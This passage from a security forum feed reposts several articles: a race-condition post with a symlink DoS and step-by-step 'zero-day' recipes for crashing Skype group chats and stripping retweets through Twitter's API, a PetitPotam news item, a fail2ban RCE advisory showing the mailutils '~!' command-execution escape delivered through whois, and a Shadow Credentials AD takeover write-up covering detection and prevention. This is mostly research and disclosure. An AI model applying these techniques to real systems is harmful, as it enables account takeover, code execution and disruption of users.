worth covering because there are still some obscure cases where this can be utilized. below is a script written by Rafal Wojtczuk demonstrating how this can be done (the example shown here can be found at Hacker’s Hut😞 This will cause the kernel to take a ridiculously long length of time to access a single file, here is the situation presented when the above script is executed: drwxr-xr-x 2 aeb 4096 l lrwxrwxrwx 1 aeb 53 l0 -> l1/../l1/../l1/../l/../../../../../../../etc/services lrwxrwxrwx 1 aeb 19 l1 -> l2/../l2/../l2/../l lrwxrwxrwx 1 aeb 19 l2 -> l3/../l3/../l3/../l lrwxrwxrwx 1 aeb 19 l3 -> l4/../l4/../l4/../l lrwxrwxrwx 1 aeb 19 l4 -> l5/../l5/../l5/../l drwxr-xr-x 2 aeb 4096 l5 Depending on how many parameters are passed to the above bash script, the larger the depth of the symlinks, meaning it can take days or even weeks for the one process to finish completion. On older machines, this will result in application-level DoS. There are many other ways in which symbolic links can be abused in order to achieve race conditions, if you want to learn more about this then I’d suggest googling as there’s simply too much to explain in a single blog post. Yet another method to slow down program execution is by increasing the timer interrupt frequency in order to force more load onto the kernel. Timer Interrupts within the Linux Kernel have a long and extensive history, so I will not be going in-depth here. In part 2 of this tutorial series you can expect many more advanced methods to slow down process execution. Final notes (and zero-days): I intentionally chose to leave out a number of methods for testing/exploiting race condition bugs within web applications, although I’ll be covering these in-depth in Part 2 of my race condition series. Meanwhile, I’ll give you an overview of what you can expect with Part 2, while also leaving you two race condition 0day exploits to (ethically) play around with. The second part of my tutorial series regarding race conditions is going to have a primary emphasis on race conditions in webapps, which I touched upon lightly in this current post. This post was my attempt at explaining what race conditions are, how they work, how to (ab)use them, and the implications of their existence in regards to bug bounty hunting. Now that I’ve covered what these bugs are and also provided a few examples of real working exploits demonstrating that race conditions do indeed exist within webapps, I’m going to be spending most of part two covering the following three areas: More advanced techniques of identifying race conditions specifically within web applications, methods of bypassing protections against this, lucrative sections of webapps to test in order to increase your chances at finding race condition bugs on a regular basis within web applications. More advanced (and several private) techniques used to slow down process execution, both within regular applications and within web applications (although mostly with emphasis on web applications since that will be the primary theme of Part 2 of this series), and how to use some practical dynamic linker tricks through hooking of (g)libc functions via LD_PRELOAD in userland/ring3, exactly like you would do with a rootkit, but with emphasis on using this to slow down program/process execution due to added strain on hooked common functions, as opposed to use of dynamic linker for stealth-based hooking. We are talking about exploiting race conditions here, not writing rootkits — so while some of these techniques are kind-of interchangeable, the methods I’ll be sharing would be very inefficient for an LD_PRELOAD based rootkit as it would make the victim’ machine slow as shit. For maintaining persistence on a hacked box, this is terrible, but for slowing down process execution to increase the odds of a race condition, this is great! You can expect me to expand upon dozens of methods of slowing down process execution to increase your odds of winning that race! Finally, just like this first part of my race condition exploitation series, I’ll be setting a trend by once again including two new zero-day exploits which are both race condition bugs. Skype Race Condition 0day: Create a Skype group chat Add a bunch of people Make two Skype bots and add them to the chat Have one bot repeatedly set the topic to ‘lol’ (lowercase) Have the other bot repeatedly set the topic to ‘LOL’ (uppercase) example, bot #1 repeatedly sends “/topic lololol” to the chat and bot #2 repeatedly sends “/topic LOLOLOL” If performed correctly, this will break the Skype client for everyone in the group chat. Every time they reload Skype, it will crash. It also makes it impossible for them to leave the group chat no matter what they try. The only way around this is to either create a fresh Skype account, or completely uninstall Skype, access skype via web (web.skype.com) to leave the group, and then reinstall Skype again. Twitter API TOC/TOU Race Condition 0day: There was a race condition bug affecting twitter’s API. This is a generic TOC/TOU race condition which allows various forms of unexpected behaviour to take place. By sending API requests concurrently to Twitter, it can result in the deletion of other people’s likes/retweets/followers. You would write a script with multiple threads, some threads sending an API request to retweet or like a tweet (from a third-party account), and the other threads simultaneously removing likes/RT’s from the same tweet from the same third-party account, once again making a request t Twitter’s API in order to do so. As a result of the Race Condition taking place, this would remove multiple likes and retweets from the affected post, rather than only the likes and retweets set to be removed via the API requests sent from the third-party account. While this has no direct security impact, it can drastically affect the outreach of a popular tweet. While running this script to simultaneously send the API requests from a third-party account, we managed to reduce a tweet with 2000+ Retweets down to 16 Retweets in a matter of minutes. The Proof-of-Concept code for this will be viewable within the “Exploits and Code Examples” section of the upcoming site of 0xFFFF where we plan to eventually integrate this blog. To see how this works in detail, you can read the full writeup here, published by a member of our team. That’s all for now — part two will be coming soon with more zerodays and a much bigger emphasis on exploitation of race condition bugs within web applications. Sursa: https://blog.0xffff.info/2021/06/23/winning-the-race-signals-symlinks-and-toc-tou/
  22. New PetitPotam NTLM Relay Attack Lets Hackers Take Over Windows Domains July 26, 2021 Ravie Lakshmanan A newly uncovered security flaw in the Windows operating system can be exploited to coerce remote Windows servers, including Domain Controllers, to authenticate with a malicious destination, thereby allowing an adversary to stage an NTLM relay attack and completely take over a Windows domain. The issue, dubbed "PetitPotam," was discovered by security researcher Gilles Lionel, who shared technical details and proof-of-concept (PoC) code last week, noting that the flaw works by forcing "Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw function." MS-EFSRPC is Microsoft's Encrypting File System Remote Protocol that's used to perform "maintenance and management operations on encrypted data that is stored remotely and accessed over a network." Specifically, the attack enables a domain controller to authenticate against a remote NTLM under a bad actor's control using the MS-EFSRPC interface and share its authentication information. This is done by connecting to LSARPC, resulting in a scenario where the target server connects to an arbitrary server and performs NTLM authentication. "An attacker can target a Domain Controller to send its credentials by using the MS-EFSRPC protocol and then relaying the DC NTLM credentials to the Active Directory Certificate Services AD CS Web Enrollment pages to enroll a DC certificate," TRUESEC's Hasain Alshakarti said. "This will effectively give the attacker an authentication certificate that can be used to access domain services as a DC and compromise the entire domain. While disabling support for MS-EFSRPC doesn't stop the attack from functioning, Microsoft has since issued mitigations for the issue, while characterizing "PetitPotam" as a "classic NTLM relay attack," which permit attackers with access to a network to intercept legitimate authentication traffic between a client and a server and relay those validated authentication requests in order to access network services. "To prevent NTLM Relay Attacks on networks with NTLM enabled, domain administrators must ensure that services that permit NTLM authentication make use of protections such as Extended Protection for Authentication (EPA) or signing features such as SMB signing," Microsoft noted. "PetitPotam takes advantage of servers where the Active Directory Certificate Services (AD CS) is not configured with protections for NTLM Relay Attacks." To safeguard against this line of attack, the Windows maker is recommending that customers disable NTLM authentication on the domain controller. In the event NTLM cannot be turned off for compatibility reasons, the company is urging users to take one of the two steps below - Disable NTLM on any AD CS Servers in your domain using the group policy Network security: Restrict NTLM: Incoming NTLM traffic. Disable NTLM for Internet Information Services (IIS) on AD CS Servers in the domain running the "Certificate Authority Web Enrollment" or "Certificate Enrollment Web Service" services PetitPotam marks the third major Windows security issue disclosed over the past month after the PrintNightmare and SeriousSAM (aka HiveNightmare) vulnerabilities. Found this article interesting? Follow THN on Facebook, Twitter  and LinkedIn to read more exclusive content we post. Sursa: https://thehackernews.com/2021/07/new-petitpotam-ntlm-relay-attack-lets.html
  23. fail2ban – Remote Code Execution JAKUB ŻOCZEK | July 26, 2021 | Research This article is about the recently published security advisory for a pretty popular software – fail2ban (CVE-2021-32749). The vulnerability, which could be massively exploited and lead to root-level code execution on multiple boxes, however this task is rather hard to achieve by regular person. It all has its roots in mailutils package and I’ve found it by a total accident when playing with mail command. The fail2ban analyses logs (or other data sources) in search of brute force traces in order to block such attempts based on the IP address. There are plenty of rules for different services (SSH, SMTP, HTTP, etc.). There are also defined actions which could be performed after blocking a client. One of these actions is sending an e-mail. If you search the Internet to find out how to send an e-mail from a command line, you will often get such solution: 1 $ echo "test e-mail" | mail -s "subject" user@example.org That is the exact way how one of fail2ban actions is configured to send e-mails about client getting blocked (./config/action.d/mail-whois.conf😞 1 2 3 4 5 6 7 8 actionban = printf %%b "Hi,\n The IP <ip> has just been banned by Fail2Ban after <failures> attempts against <name>.\n\n Here is more information about <ip> :\n `%(_whois_command)s`\n Regards,\n Fail2Ban"|mail -s "[Fail2Ban] <name>: banned <ip> from <fq-hostname>" <dest> There is nothing suspicious about the above, until knowing about one specific thing that can be found inside the mailutils manual. It is the tilde escape sequences: The ‘~!’ escape executes specified command and returns you to mail compose mode without altering your message. When used without arguments, it starts your login shell. The ‘~|’ escape pipes the message composed so far through the given shell command and replaces the message with the output the command produced. If the command produced no output, mail assumes that something went wrong and retains the old contents of your message. This is the way it works in real life: 1 2 3 4 5 6 7 8 9 jz@fail2ban:~$ cat -n pwn.txt 1 Next line will execute command 2 ~! uname -a 3 4 Best, 5 JZ jz@fail2ban:~$ cat pwn.txt | mail -s "whatever" whatever@whatever.com Linux fail2ban 4.19.0-16-cloud-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64 GNU/Linux jz@fail2ban:~$ If you get back to the previously mentioned fail2ban e-mail action you can notice there is a whois output attached to the e-mail body. So if we could add some tilde escape sequence to whois output of our IP address – well, it should end up with code execution. As root. What are our options? As attackers we need to control the whois output – how to achieve that? Well, the first thing which came into my mind was to kindly ask my ISP to contact RIPE and make a pretty custom entry for my particular IP address. Unfortunately – it doesn’t work like that. RIPE/ARIN/APNIC and others put entries for whole IP classes as minimum, not for particular one IP address. Also, I’m more than sure that achieving it is extremely hard in a formal way, plus the fact that putting malicious payload as a whois entry would make people ask questions. Is there a way to start my own whois server? Surprisingly – there is, and you can find a couple of them running over the Internet. By digging whois related RFC you can find information about an attribute called ReferralServer. If your whois client will find such an attribute in the response, it will query the server that was set in the value to get more information about the IP address or domain. Just take a look what happens when getting whois for 157.5.7.5 IP address: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 $ whois 157.5.7.5 # # ARIN WHOIS data and services are subject to the Terms of Use # available at: https://www.arin.net/resources/registry/whois/tou/ # # If you see inaccuracies in the results, please report at # https://www.arin.net/resources/registry/whois/inaccuracy_reporting/ # # Copyright 1997-2021, American Registry for Internet Numbers, Ltd. # NetRange: 157.1.0.0 - 157.14.255.255 CIDR: 157.4.0.0/14, 157.14.0.0/16, 157.1.0.0/16, 157.12.0.0/15, 157.2.0.0/15, 157.8.0.0/14 NetName: APNIC-ERX-157-1-0-0 NetHandle: NET-157-1-0-0-1 Parent: NET157 (NET-157-0-0-0-0) NetType: Early Registrations, Transferred to APNIC OriginAS: Organization: Asia Pacific Network Information Centre (APNIC) [… cut …] ReferralServer: whois://whois.apnic.net ResourceLink: http://wq.apnic.net/whois-search/static/search.html OrgTechHandle: AWC12-ARIN OrgTechName: APNIC Whois Contact OrgTechPhone: +61 7 3858 3188 OrgTechEmail: search-apnic-not-arin@apnic.net [… cut …] Found a referral to whois.apnic.net. % [whois.apnic.net] % Whois data copyright terms http://www.apnic.net/db/dbcopyright.html % Information related to '157.0.0.0 - 157.255.255.255' % Abuse contact for '157.0.0.0 - 157.255.255.255' is 'helpdesk@apnic.net' inetnum: 157.0.0.0 - 157.255.255.255 netname: ERX-NETBLOCK descr: Early registration addresses [… cut …] In theory and while having a pretty big network you could probably ask your Regional Internet Registries to use RWhois for your network. On the other hand – simply imagine black hats breaking into a server running rwhois, putting a malicious entry there and then starting the attack. To be fair this scenario seems to be way easier than becoming a big company to legally have its own whois server. In case you’re a government and you can simply control network traffic – the task is way easier. By taking a closer look at the whois protocol, we can notice few things: it was designed really long time ago, it’s pretty simple (you ask for IP or domain name and get the raw output), it’s unencrypted on the network level. By simply performing a MITM attack on an unencrypted protocol (which whois is) attackers could just put the tilde escape sequence and start an attack over multiple hosts. It’s worth remembering that the root problem here is mailutils which has this flaw by design. I believe a lot of people are unaware about such a feature, and there’s still plenty of software that could use the mail command this way. As could be noticed many times in history – security is hard and complex. Sometimes totally innocent functionality which you wouldn’t ever suspect for being a threat could be a cause of dangerous vulnerability. Author: Jakub Żoczek Sursa: https://research.securitum.com/fail2ban-remote-code-execution/
  24. Key-Checker Go scripts for checking API key / access token validity Update V1.0.0 🚀 Added 37 checkers! Screenshoot 📷 How to Install go get github.com/daffainfo/Key-Checker Reference 📚 https://github.com/streaak/keyhacks Sursa: https://github.com/daffainfo/Key-Checker
  25. Shadow Credentials: Abusing Key Trust Account Mapping for Account Takeover Elad Shamir The techniques for DACL-based attacks against User and Computer objects in Active Directory have been established for years. If we compromise an account that has delegated rights over a user account, we can simply reset their password, or, if we want to be less disruptive, we can set an SPN or disable Kerberos pre-authentication and try to roast the account. For computer accounts, it is a bit more complicated, but RBCD can get the job done. These techniques have their shortcomings: Resetting a user’s password is disruptive, may be reported, and may not be permitted per the Rules of Engagement (ROE). Roasting is time-consuming and depends on the target having a weak password, which may not be the case. RBCD is hard to follow because someone (me) failed to write a clear and concise post about it. RBCD requires control over an account with an SPN, and creating a new computer account to meet that requirement may lead to detection and cannot be cleaned up until privilege escalation is achieved. The recent work that Will Schroeder (@harmj0y) and Lee Christensen (@tifkin_) published about AD CS made me think about other technologies that use Public Key Cryptography for Initial Authentication (PKINIT) in Kerberos, and Windows Hello for Business was the obvious candidate, which led me to (re)discover an alternative technique for user and computer object takeover. Tl;dr It is possible to add “Key Credentials” to the attribute msDS-KeyCredentialLink of the target user/computer object and then perform Kerberos authentication as that account using PKINIT. In plain English: this is a much easier and more reliable takeover primitive against Users and Computers. A tool to operationalize this technique has been released alongside this post. Previous Work When I looked into Key Trust, I found that Michael Grafnetter (@MGrafnetter) had already discovered this abuse technique and presented it at Black Hat Europe 2019. His discovery of this user and computer object takeover technique somewhat flew under the radar, I believe because this technique was only the primer to the main topic of his talk. Michael clearly demonstrated this abuse in his talk and noted that it affected both users and computers. In his presentation, Michael explained some of the inner workings of WHfB and the Key Trust model, and I highly recommend watching it. Michael has also been maintaining a library called DSInternals that facilitates the abuse of this mechanism, and a lot more. I recently ported some of Michael’s code to a new C# tool called Whisker to be used via implants on operations. More on that below. What is PKINIT? In Kerberos authentication, clients must perform “pre-authentication” before the KDC (the Domain Controller in an Active Directory environment) provides them with a Ticket Granting Ticket (TGT), which can subsequently be used to obtain Service Tickets. The reason for pre-authentication is that without it, anyone could obtain a blob encrypted with a key derived from the client’s password and try to crack it offline, as done in the AS-REP Roasting Attack. The client performs pre-authentication by encrypting a timestamp with their credentials to prove to the KDC that they have the credentials for the account. Using a timestamp rather than a static value helps prevent replay attacks. The symmetric key (secret key) approach, which is the one most widely used and known, uses a symmetric key derived from the client’s password, AKA secret key. If using RC4 encryption, this key would be the NT hash of the client’s password. The KDC has a copy of the client’s secret key and can decrypt the pre-authentication data to authenticate the client. The KDC uses the same key to encrypt a session key sent to the client along with the TGT. PKINIT is the less common, asymmetric key (public key) approach. The client has a public-private key pair, and encrypts the pre-authentication data with their private key, and the KDC decrypts it with the client’s public key. The KDC also has a public-private key pair, allowing for the exchange of a session key using one of two methods: Diffie-Hellman Key Delivery The Diffie-Hellman Key Delivery allows the KDC and the client to securely establish a shared session key that cannot be intercepted by attackers performing passive man-in-the-middle attacks, even if the attacker has the client’s or the KDC’s private key, (almost) providing Perfect Forward Secrecy. I say _almost _because the session key is also stored inside the encrypted part of the TGT, which is encrypted with the secret key of the KRBTGT account. Public Key Encryption Key Delivery Public Key Encryption Key Delivery uses the KDC’s private key and the client’s public key to envelop a session key generated by the KDC. Traditionally, Public Key Infrastructure (PKI) allows the KDC and the client to exchange their public keys using Digital Certificates signed by an entity that both parties have previously established trust with — the Certificate Authority (CA). This is the Certificate Trust model, which is most commonly used for smartcard authentication. PKINIT is not possible out of the box in every Active Directory environment. The key (pun intended) is that both the KDC and the client need a public-private key pair. However, if the environment has AD CS and a CA available, the Domain Controller will automatically obtain a certificate by default. No PKI? No Problem! Microsoft also introduced the concept of Key Trust, to support passwordless authentication in environments that don’t support Certificate Trust. Under the Key Trust model, PKINIT authentication is established based on the raw key data rather than a certificate. The client’s public key is stored in a multi-value attribute called msDS-KeyCredentialLink, introduced in Windows Server 2016. The values of this attribute are Key Credentials, which are serialized objects containing information such as the creation date, the distinguished name of the owner, a GUID that represents a Device ID, and, of course, the public key. It is a multi-value attribute because an account have several linked devices. This trust model eliminates the need to issue client certificates for everyone using passwordless authentication. However, the Domain Controller still needs a certificate for the session key exchange. This means that if you can write to the msDS-KeyCredentialLink property of a user, you can obtain a TGT for that user. Windows Hello for Business Provisioning and Authentication Windows Hello for Business (WHfB) supports multi-factor passwordless authentication. When the user enrolls, the TPM generates a public-private key pair for the user’s account — the private key should never leave the TPM. Next, if the Certificate Trust model is implemented in the organization, the client issues a certificate request to obtain a trusted certificate from the environment’s certificate issuing authority for the TPM-generated key pair. However, if the Key Trust model is implemented, the public key is stored in a new Key Credential object in the msDS-KeyCredentialLink attribute of the account. The private key is protected by a PIN code, which Windows Hello allows replacing with a biometric authentication factor, such as fingerprint or face recognition. When a client logs in, Windows attempts to perform PKINIT authentication using their private key. Under the Key Trust model, the Domain Controller can decrypt their pre-authentication data using the raw public key in the corresponding NGC object stored in the client’s msDS-KeyCredentialLink attribute. Under the Certificate Trust model, the Domain Controller will validate the trust chain of the client’s certificate and then use the public key inside it. Once pre-authentication is successful, the Domain Controller can exchange a session key via Diffie-Hellman Key Delivery or Public Key Encryption Key Delivery. Note that I intentionally used the term “client” rather than “user” here because this mechanism applies to both users and computers. What About NTLM? PKINIT allows WHfB users, or, more traditionally, smartcard users, to perform Kerberos authentication and obtain a TGT. But what if they need to access resources that require NTLM authentication? To address that, the client can obtain a special Service Ticket that contains their NTLM hash inside the Privilege Attribute Certificate (PAC) in an encrypted NTLM_SUPPLEMENTAL_CREDENTIAL entity. The PAC is stored inside the encrypted part of the ticket, and the ticket is encrypted using the key of the service it is issued for. In the case of a TGT, the ticket is encrypted using the key of the KRBTGT account, which the user should not be able to decrypt. To obtain a ticket that the user can decrypt, the user must perform Kerberos User to User (U2U) authentication to itself. When I first read the title of the RFC for this mechanism, I thought to myself, “Does that mean we can abuse this mechanism to Kerberoast any user account? That must be too good to be true”. And it was — the risk of Kerberoasting was taken into consideration, and U2U Service Tickets are encrypted using the target user’s session key rather than their secret key. That presented another challenge for the U2U design — every time a client authenticates and obtains a TGT, a new session key is generated. Also, KDC does not maintain a repository of active session keys — it extracts the session key from the client’s ticket. So, what session key should the KDC use when responding to a U2U TGS-REQ? The solution was sending a TGS-REQ containing the target user’s TGT as an “additional ticket”. The KDC will extract the session key from the TGT’s encrypted part (hence not really perfect forward secrecy) and generate a new service ticket. So, if a user requests a U2U Service Ticket from itself to itself, they will be able to decrypt it and access the PAC and the NTLM hash. This means that if you can write to the msDS-KeyCredentialLink property of a user, you can retrieve the NT hash of that user. As per MS-PAC, the NTLM_SUPPLEMENTAL_CREDENTIAL entity is added to the PAC only if PKINIT authentication was performed. Back in 2017, Benjamin Delpy (@gentilkiwi) introduced code to Kekeo to support retrieving the NTLM hash of an account using this technique, and it will be added to Rubeus in an upcoming release. Abuse When abusing Key Trust, we are effectively adding alternative credentials to the account, or “Shadow Credentials”, allowing for obtaining a TGT and subsequently the NTLM hash for the user/computer. Those Shadow Credentials would persist even if the user/computer changed their password. Abusing Key Trust for computer objects requires additional steps after obtaining a TGT and the NTLM hash for the account. There are generally two options: Forge an RC4 silver ticket to impersonate privileged users to the corresponding host. Use the TGT to call S4U2Self to impersonate privileged users to the corresponding host. This option requires modifying the obtained Service Ticket to include a service class in the service name. Key Trust abuse has the added benefit that it doesn’t delegate access to another account which could get compromised — it is restricted to the private key generated by the attacker. In addition, it doesn’t require creating a computer account that may be hard to clean up until privilege escalation is achieved. Whisker Alongside this post I am releasing a tool called “ Whisker “. Based on code from Michael’s DSInternals, Whisker provides a C# wrapper for performing this attack on engagements. Whisker updates the target object using LDAP, while DSInternals allows updating objects using both LDAP and RPC with the Directory Replication Service (DRS) Remote Protocol. Whisker has four functions: Add — This function generates a public-private key pair and adds a new key credential to the target object as if the user enrolled to WHfB from a new device. List — This function lists all the entries of the msDS-KeyCredentialLink attribute of the target object. Remove — This function removes a key credential from the target object specified by a DeviceID GUID. Clear — This function removes all the values from the msDS-KeyCredentialLink attribute of the target object. If the target object is legitimately using WHfB, it will break. Requirements This technique requires the following: At least one Windows Server 2016 Domain Controller. A digital certificate for Server Authentication installed on the Domain Controller. Windows Server 2016 Functional Level in Active Directory. Compromise an account with the delegated rights to write to the msDS-KeyCredentialLink attribute of the target object. Detection There are two main opportunities for detection of this technique: If PKINIT authentication is not common in the environment or not common for the target account, the “Kerberos authentication ticket (TGT) was requested” event (4768) can indicate anomalous behavior when the Certificate Information attributes are not blank, as shown below: If a SACL is configured to audit Active Directory object modifications for the targeted account, the “Directory service object was modified” event (5136) can indicate anomalous behavior if the subject changing the msDS-KeyCredentialLink is not the Azure AD Connect synchronization account or the ADFS service account, which will typically act as the Key Provisioning Server and legitimately modify this attribute for users. Prevention It is generally a good practice to proactively audit all inbound object control for highly privileged accounts. Just as users with lower privileges than Domain Admins shouldn’t be able to reset the passwords of members of the Domain Admins group, less secure, or less “trustworthy”, users with lower privileges should not be able to modify the msDS-KeyCredentialLink attribute of privileged accounts. A more specific preventive control is adding an Access Control Entry (ACE) to DENY the principal EVERYONE from modifying the attribute msDS-KeyCredentialLink for any account not meant to be enrolled in Key Trust passwordless authentication, and particularly privileged accounts. However, an attacker with WriteOwner or WriteDACL privileges will be able to override this control, which can be detected with a suitable SACL. Conclusion Abusing Key Trust Account Mapping is a simpler way to take over user and computer accounts in Active Directory environments that support PKINIT for Kerberos authentication and have a Windows Server 2016 Domain Controller with the same functional level. References Whisker by (@elad_shamir) Exploiting Windows Hello for Business (Black Hat Europe 2019) by Michael Grafnetter (@MGrafnetter) DSInternals by Michael Grafnetter (@MGrafnetter) Sursa: https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab
  1. Load more activity
×
×
  • Create New...